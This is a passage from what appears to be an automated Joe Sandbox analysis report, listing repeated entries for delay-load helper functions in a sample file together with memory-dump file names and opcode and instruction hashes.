                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2b9191cb3b06f5141f732fc6b30ffe834183c72a5651981ea54819241354172d
                • Instruction ID: a0ccf2d96e655733d490e788f1402472b1f47b77c156155db1f655ec755dde4c
                • Opcode Fuzzy Hash: 2b9191cb3b06f5141f732fc6b30ffe834183c72a5651981ea54819241354172d
                • Instruction Fuzzy Hash: 4CB012A5B7C0416C310C91176D0BF3A075CF3C0B12B30402FB41AD01C0EA445C0D403B
                Function 004EDBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 34c32ca6068b501effce7485df2e3b30851977dbe65bc92962db7fb97d6550ae
                • Instruction ID: 8bb1fe1868b061dbf307e5dc94e50a504fcd3e58c81e122a66c9ae0b951d507a
                • Opcode Fuzzy Hash: 34c32ca6068b501effce7485df2e3b30851977dbe65bc92962db7fb97d6550ae
                • Instruction Fuzzy Hash: 55B012A5B7C042AC310C91076C0BE3B07ACE3C0B12B30801FB809D11C0EA445C0D403B
                Function 004EDBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5353d3c704b1bd6665ca54c5c234c3901fd7de56a270bd31c0304154471f8173
                • Instruction ID: fc5a10fbbf445cd42e3155a6e1bc1decb3452cf7856842d052da4c6b0f35594b
                • Opcode Fuzzy Hash: 5353d3c704b1bd6665ca54c5c234c3901fd7de56a270bd31c0304154471f8173
                • Instruction Fuzzy Hash: 48B012A5B7C0826C310C91076D0BE3B0B5CE3C0B12B30801FB509D01C0EA445C0A403B
                Function 004EDC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6cac0212a7616c57633fc6da27f652a9dcf77b5ad4b1196a47f227423cd67797
                • Instruction ID: 5223383e389bd62a7a1429d33e8cfd882d236097ba7b277594893ad68ff35032
                • Opcode Fuzzy Hash: 6cac0212a7616c57633fc6da27f652a9dcf77b5ad4b1196a47f227423cd67797
                • Instruction Fuzzy Hash: 99B012B5E7C6416C310CA10BAD02D3E076CE3C0B52B30451FB109D01C0D5849C05803E
                Function 004EDC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 445ea6db668a4ffe2e124de1b6ddf52c97d5a2b1abc5a35d136a6545e4aa877f
                • Instruction ID: b0426b4974869a9d7bb434732cce79d2c711b17b3b0b30ec5376d3ef7cc1a760
                • Opcode Fuzzy Hash: 445ea6db668a4ffe2e124de1b6ddf52c97d5a2b1abc5a35d136a6545e4aa877f
                • Instruction Fuzzy Hash: BFB012B5E6C5416C310CA10BAD02D3E076CD3C4B52B30851FB509D01C0D5845C05803E
                Function 004EDC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8e77a1f8aceaaecf7767b87152d3b938f55f2b797ebaa8426fd6687932600cf0
                • Instruction ID: 43c96b1add61dc3b45860df573d0aa77c3170a2af2f3f0e0dbbff766d5f96755
                • Opcode Fuzzy Hash: 8e77a1f8aceaaecf7767b87152d3b938f55f2b797ebaa8426fd6687932600cf0
                • Instruction Fuzzy Hash: ABB012B5E6C6417C310C6107BF02C3E072CD3C0B52B30461FB105E00C095C45C45903E
                Function 004ED8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9094ad0ab50640b5d4e963d68ecaf95c3665d353620cbd4c97808f1af94b69ec
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 9094ad0ab50640b5d4e963d68ecaf95c3665d353620cbd4c97808f1af94b69ec
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8f54b90a1e561e1ab52999d9c499a87858eea6b30c1051b0cd31efa89bb6dbe4
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 8f54b90a1e561e1ab52999d9c499a87858eea6b30c1051b0cd31efa89bb6dbe4
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2a91682045564e61384168bf05a07cef5c93b3837e812e862178a4816d5c98c8
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 2a91682045564e61384168bf05a07cef5c93b3837e812e862178a4816d5c98c8
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 79c7dc86dc50eeaacc7a904f7fa2cd6415355593e84f4218773c021432e2f01e
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 79c7dc86dc50eeaacc7a904f7fa2cd6415355593e84f4218773c021432e2f01e
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 1eac69261b3c8ceb30552f79ce6ef49adb7c1fedb9325881bc269621ce998fa1
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 1eac69261b3c8ceb30552f79ce6ef49adb7c1fedb9325881bc269621ce998fa1
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b989510347a1b5a39d2500d512fa5ec768c9416413c595b4e65d0c1e9d98ee88
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: b989510347a1b5a39d2500d512fa5ec768c9416413c595b4e65d0c1e9d98ee88
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5b11bb9518ec7e720eb2a1381431fb27307736d23b5ad52ca94dc585f31eaed5
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 5b11bb9518ec7e720eb2a1381431fb27307736d23b5ad52ca94dc585f31eaed5
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5efecb80e1119e8c486cb417f802be2267d33308542df6e233a889f8b555743f
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 5efecb80e1119e8c486cb417f802be2267d33308542df6e233a889f8b555743f
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2512e09256428d77c344eeff980f315e5b5b72080c596e3bb816d75d6fa0db19
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 2512e09256428d77c344eeff980f315e5b5b72080c596e3bb816d75d6fa0db19
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6d110fe9149bc4c3e2f98217ae1fc21e69420c78aa2961d2c1f1b7ed6fe00ebf
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 6d110fe9149bc4c3e2f98217ae1fc21e69420c78aa2961d2c1f1b7ed6fe00ebf
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                Function 004ED997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
